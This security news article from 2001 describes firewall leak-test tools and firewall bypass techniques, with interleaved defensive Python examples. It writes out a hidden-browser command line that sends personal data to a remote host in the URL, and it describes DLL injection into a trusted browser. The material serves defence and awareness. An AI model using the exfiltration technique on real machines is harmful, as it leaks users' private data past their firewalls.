Security News

New Leak Tests: Today's Personal Firewalls have to be improved

November 8, 2001

New leak test tools called "Yalta", "TooLeaky" and "FireHole" try to prove that the outbound filtering feature used by most personal firewalls is totally deceptive.

The most famous leak test tool was made by Steve Gibson, the owner of GRC.com. Gibson's test utility, called "Leak Test", proved the poor quality of most personal firewalls by bypassing their outbound traffic detection. While the majority of firewalls relied on application trust levels set by the user, it was shown that simply replacing a trusted application with a malicious agent of the same name would make the firewall allow outbound traffic from the malicious program with all the privileges of the real version. Firewall developers afterwards fixed this bug by computing checksums of the trusted applications and warning the user if a dissimilar copy of an application was identified.
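The checksum fix described above, as an added example that is not code from PC Flank or from any firewall vendor: an application rule records a hash of the binary at approval time, and an outbound request is honoured only while the file on disk still matches. The file names, contents and the three decision strings are constructed for this demonstration.

```python
"""Checksum-based trust check for firewall application rules (added example)."""
import hashlib
import os
import tempfile


def file_sha256(path: str) -> str:
    """Hash the file in chunks so large executables need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def register_trusted_app(rules: dict, path: str) -> str:
    """Record the hash of the binary at the moment the user approved the rule."""
    digest = file_sha256(path)
    rules[os.path.abspath(path)] = digest
    return digest


def check_outbound(rules: dict, path: str) -> str:
    """Decide what to do with an outbound connection attempt from `path`.

    Returns one of:
      "allow"   - a rule exists and the binary hash is unchanged
      "prompt"  - a rule exists but the file differs from the approved copy
      "unknown" - no rule for this path
    A firewall keyed on the file name alone would answer "allow" in the
    "prompt" case too, which is exactly the name-swap weakness Leak Test showed.
    """
    key = os.path.abspath(path)
    expected = rules.get(key)
    if expected is None:
        return "unknown"
    if file_sha256(path) != expected:
        return "prompt"
    return "allow"


def demo() -> tuple:
    """Approve a binary, overwrite it in place under the same name, re-check.

    Returns the decision before and after the swap: ('allow', 'prompt').
    """
    rules = {}
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed stand-in for a real trusted program
        app = os.path.join(tmp, "browser.exe")
        with open(app, "wb") as fh:
            fh.write(b"MZ original trusted program")
        register_trusted_app(rules, app)
        before = check_outbound(rules, app)
        # Same path, same name, different contents
        with open(app, "wb") as fh:
            fh.write(b"MZ replacement with the same name")
        after = check_outbound(rules, app)
    return before, after


if __name__ == "__main__":
    print(demo())
```

The hash must be recomputed at every connection attempt (or whenever the file's metadata changes), not only at approval time; a firewall that caches the verdict per process name reintroduces the original weakness.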

"Yalta", "TooLeaky" and "FireHole" use a different technique to test the outbound filtering feature of firewalls.

"Yalta" (http://www.soft4ever.com/security_test/En/index.htm), created by the developers of the Look'n'Stop firewall, "uses a different way than a classical leaktest to send packets". The main difference between "Yalta" and Gibson's "Leak Test" is that Yalta uses UDP instead of TCP. "Yalta" acts like a Trojan trying to send a message to a remote address while bypassing the firewall's filters.

"Yalta" consists of two tests: the Classical Leak Test and the Enhanced Leak Test. The tool allows testing the firewall both externally and locally. Most firewalls pass the external test (when "Yalta" tries to send a message to a remote IP) but have difficulties passing the local test.

It seems that the only firewall able to pass the local test is Look'n'Stop itself. But the point is that when you test your firewall locally and it fails, the sent message does not leave your computer at all. So should we consider that a "leak"?

Mikhail Zakhryapin, the Director of Agnitum Ltd. (the developer of the Outpost firewall), says no.

"I do not understand their hidden statement that all world-wide known firewalls are "leaky". "Leak" in everyone's opinion is when a firewall allows packet transmission to the net without the user's knowledge. Using default Yalta settings, packets do not even leave the user's PC!", said Mikhail in his message to users posted on the Agnitum forum.

On the other hand, "TooLeaky" and "FireHole" exploit weaknesses in the system's web browser to bypass the firewall's outbound traffic detection.

"TooLeaky" (http://tooleaky.zensoft.com) uses the system's web browser to transmit information without the user's knowledge.

The tool opens the default web browser with the following command line:

iexplore.exe http://grc.com/lt/leaktest.htm?PersonalInfoGoesHere

The browser window is hidden, so the user does not notice it. If the firewall allows the web browser to access port 80, then any personal data can be transmitted to the remote address (GRC.com in this case). Such data could be anything, including the user's passwords, credit card information and much more.
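A detection view of the pattern just described, as an added example that is not code from the article or from TooLeaky's author: it scans process-creation records and flags a browser that was started by a non-interactive parent, with a hidden window, or with a URL whose query string carries data. The `key=value` record format, the parent/image/window field names and the sample records are constructed for this example and do not correspond to any vendor's log format.

```python
"""Flag hidden browser launches that carry data in the URL (added example)."""
import shlex
from urllib.parse import urlparse

BROWSERS = {"iexplore.exe", "firefox.exe", "opera.exe"}
# Parents from which a user normally starts a browser (assumption for the demo)
INTERACTIVE_PARENTS = {"explorer.exe"}


def parse_record(line: str) -> dict:
    """Turn 'key=value key="quoted value"' into a dict; shlex handles quoting."""
    return dict(token.split("=", 1) for token in shlex.split(line))


def url_carries_data(cmdline: str) -> bool:
    """True when any argument is an http(s) URL with a non-empty query string."""
    for arg in shlex.split(cmdline):
        parsed = urlparse(arg)
        if parsed.scheme in ("http", "https") and parsed.query:
            return True
    return False


def classify(record: dict) -> list:
    """Return the reasons (possibly none) why this browser launch looks suspicious."""
    image = record.get("image", "").lower()
    if image not in BROWSERS:
        return []
    reasons = []
    if record.get("parent", "").lower() not in INTERACTIVE_PARENTS:
        reasons.append("non-interactive parent")
    if record.get("window") == "hidden":
        reasons.append("hidden window")
    if url_carries_data(record.get("cmdline", "")):
        reasons.append("data in URL query string")
    return reasons


def scan(lines) -> list:
    """Return (pid, reasons) for every record with at least one suspicious trait."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        reasons = classify(rec)
        if reasons:
            alerts.append((rec["pid"], reasons))
    return alerts


# Constructed sample records: a normal launch, a launch matching the pattern
# above (note the query string), and an unrelated process.
SAMPLE_LOG = [
    'pid=1204 parent=explorer.exe image=iexplore.exe window=normal '
    'cmdline="iexplore.exe http://example.com/"',
    'pid=1388 parent=leakdemo.exe image=iexplore.exe window=hidden '
    'cmdline="iexplore.exe http://example.com/lt/leaktest.htm?PersonalInfoGoesHere"',
    'pid=1402 parent=explorer.exe image=notepad.exe window=normal cmdline="notepad.exe"',
]

if __name__ == "__main__":
    for pid, why in scan(SAMPLE_LOG):
        print(pid, ", ".join(why))
```

A query string alone is a weak signal (ordinary browsing produces plenty of them); the parent process and window state are what separate this pattern from normal use, which is why the check reports all three reasons rather than a single verdict.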

Like "TooLeaky", "FireHole" (http://keir.net/firehole.html) uses the default web browser to transmit data to a remote host, but the technique this tool uses is much more sophisticated and powerful.

"FireHole" installs a DLL (containing an intercept function) on the user's computer. This DLL is then loaded into every subsequently started program and runs in the same process space as that program. "FireHole" thus executes inside the process space of the system's default browser, which is almost certainly trusted by the firewall.
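One check a firewall could make against the foreign-DLL technique just described, as an added example that is not code from the article or from FireHole's author: before honouring a browser's application rule, compare the modules loaded in that process against the directories its own modules are expected to come from. The expected directories, the module lists and the `check_process` name are constructed for this example; a real implementation would read the loaded-module list from the operating system.

```python
"""Module-allowlist check for a trusted browser process (added example)."""

# Directories a browser's own modules are expected to load from (assumption).
EXPECTED_DIRS = [
    r"C:\Windows\System32",
    r"C:\Program Files\Internet Explorer",
]


def is_under(path: str, root: str) -> bool:
    """Case-insensitive test that `path` lies beneath directory `root`."""
    p = path.lower().replace("/", "\\")
    r = root.lower().replace("/", "\\").rstrip("\\") + "\\"
    return p.startswith(r)


def foreign_modules(modules, expected_dirs=EXPECTED_DIRS) -> list:
    """Return loaded modules that come from outside the expected directories."""
    return [m for m in modules if not any(is_under(m, d) for d in expected_dirs)]


def check_process(modules) -> str:
    """'allow' when every module is expected, otherwise a prompt naming the rest."""
    foreign = foreign_modules(modules)
    if foreign:
        return "prompt: unexpected modules " + ", ".join(foreign)
    return "allow"


# Constructed module lists for the demonstration.
CLEAN_MODULES = [
    r"C:\Program Files\Internet Explorer\iexplore.exe",
    r"C:\Windows\System32\ntdll.dll",
    r"C:\Windows\System32\wininet.dll",
]
INJECTED_MODULES = CLEAN_MODULES + [
    r"C:\Users\demo\AppData\Local\Temp\hook.dll",
]

if __name__ == "__main__":
    print(check_process(CLEAN_MODULES))
    print(check_process(INJECTED_MODULES))
```

A directory allowlist catches a DLL dropped into a temporary or user-writable folder but not one placed inside the browser's own directory; a per-module hash or signature check is the stronger form of the same idea, at the cost of a larger baseline to maintain.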

Robin Keir, the creator of the tool, says "FireHole" is not limited to using the HTTP protocol and can send and receive any amount of data.

Although "FireHole" relies on flaws in web browsers, it dramatically calls into question the effectiveness of the outbound filtering feature used by today's personal firewalls.

Now it is the firewall developers' turn. While blocking the flaw used by "TooLeaky" seems a simple task, defending against "FireHole" is not that easy.

Until malicious agents using the same techniques get onto your computer, you are safe. So never open or execute unknown e-mail attachments, and keep your antivirus, anti-Trojan and firewall software up to date.

© 2006 PC Flank Ltd. All rights reserved.